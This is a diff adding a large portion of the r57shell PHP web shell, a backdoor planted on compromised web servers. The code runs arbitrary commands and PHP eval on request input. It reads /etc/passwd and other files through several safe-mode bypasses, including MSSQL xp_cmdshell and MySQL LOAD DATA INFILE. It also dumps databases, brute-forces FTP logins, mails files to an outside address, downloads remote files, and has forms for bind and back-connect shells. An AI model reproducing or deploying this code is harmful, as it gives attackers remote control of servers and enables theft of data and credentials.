$inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text777'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text888'].$arrow."</b>",in('text','u1p',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text7777'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text8888'].$arrow."</b>",in('text','Mohajer22',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text999'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text9999'].$arrow."</b>","<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','string',60,(($_POST['string'])?($_POST['string']):("/etc/passwd"))).ws(2)."<b>".in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text1010'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text101010'].$arrow."</b>","<select name=plugin><option>cat /etc/passwd</option><option>/bin/ls</option><option>tempnam</option><option>/tmp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):(""))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; + +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo 